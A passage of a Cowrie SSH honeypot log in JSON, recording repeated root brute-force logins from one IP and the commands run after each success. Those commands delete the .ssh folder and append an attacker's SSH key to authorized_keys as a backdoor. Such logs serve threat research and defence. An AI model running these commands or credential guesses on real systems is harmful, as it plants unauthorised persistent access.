AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.078341Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.334162Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.335263Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47916,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2fb7b05b800","protocol":"ssh","message":"New connection: 212.227.235.229:47916 (1.2.3.4:22) [session: e2fb7b05b800]","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.577715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.580411Z","src_ip":"212.227.235.229","session":"e2fb7b05b800"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:50.832566Z","src_ip":"212.227.235.229","session":"e2fb7b05b800"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:19:51.824543Z","src_ip":"212.227.235.229","session":"e2fb7b05b800"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:53.076715Z","src_ip":"212.227.235.229","session":"e2fb7b05b800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48392,"dst_ip":"1.2.3.4","dst_port":22,"session":"589c739a1b20","protocol":"ssh","message":"New connection: 212.227.235.229:48392 (1.2.3.4:22) [session: 589c739a1b20]","sensor":"my-vps","timestamp":"2025-09-09T02:19:53.328838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:53.339100Z","src_ip":"212.227.235.229","session":"589c739a1b20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:53.587075Z","src_ip":"212.227.235.229","session":"589c739a1b20"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:54.594104Z","src_ip":"212.227.235.229","session":"589c739a1b20"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:54.846603Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:54.847674Z","src_ip":"212.227.235.229","session":"589c739a1b20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55612,"dst_ip":"1.2.3.4","dst_port":22,"session":"1121f8ae23c7","protocol":"ssh","message":"New connection: 212.227.235.229:55612 (1.2.3.4:22) [session: 1121f8ae23c7]","sensor":"my-vps","timestamp":"2025-09-09T02:19:57.682564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:57.683536Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:57.940187Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer4321","message":"login attempt [root/Qwer4321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:58.995678Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:59.533172Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:59.533883Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:59.535099Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:59.787147Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:20:00.410239Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:20:00.410919Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:20:00.664526Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:00.665418Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55616,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7075f2850bc","protocol":"ssh","message":"New connection: 212.227.235.229:55616 (1.2.3.4:22) [session: d7075f2850bc]","sensor":"my-vps","timestamp":"2025-09-09T02:20:00.930602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:00.931500Z","src_ip":"212.227.235.229","session":"d7075f2850bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:01.201448Z","src_ip":"212.227.235.229","session":"d7075f2850bc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:02.310798Z","src_ip":"212.227.235.229","session":"d7075f2850bc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:03.583799Z","src_ip":"212.227.235.229","session":"d7075f2850bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48832,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c1fba7fe0d7","protocol":"ssh","message":"New connection: 212.227.235.229:48832 (1.2.3.4:22) [session: 3c1fba7fe0d7]","sensor":"my-vps","timestamp":"2025-09-09T02:20:03.848285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:03.856157Z","src_ip":"212.227.235.229","session":"3c1fba7fe0d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:04.112203Z","src_ip":"212.227.235.229","session":"3c1fba7fe0d7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:20:05.145982Z","src_ip":"212.227.235.229","session":"3c1fba7fe0d7"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:05.396120Z","src_ip":"212.227.235.229","session":"1121f8ae23c7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:05.404372Z","src_ip":"212.227.235.229","session":"3c1fba7fe0d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51456,"dst_ip":"1.2.3.4","dst_port":22,"session":"46dc7af07b3a","protocol":"ssh","message":"New connection: 212.227.235.229:51456 (1.2.3.4:22) [session: 46dc7af07b3a]","sensor":"my-vps","timestamp":"2025-09-09T02:20:31.665387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:31.674583Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:32.046160Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.login.success","username":"root","password":"test1234!","message":"login attempt [root/test1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:20:33.549306Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:20:34.376202Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:20:34.377006Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:20:34.378221Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:34.762101Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:20:35.523402Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:20:35.524359Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:20:35.899239Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:35.900258Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53306,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b86506c0776","protocol":"ssh","message":"New connection: 212.227.235.229:53306 (1.2.3.4:22) [session: 3b86506c0776]","sensor":"my-vps","timestamp":"2025-09-09T02:20:36.276661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:36.280297Z","src_ip":"212.227.235.229","session":"3b86506c0776"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchan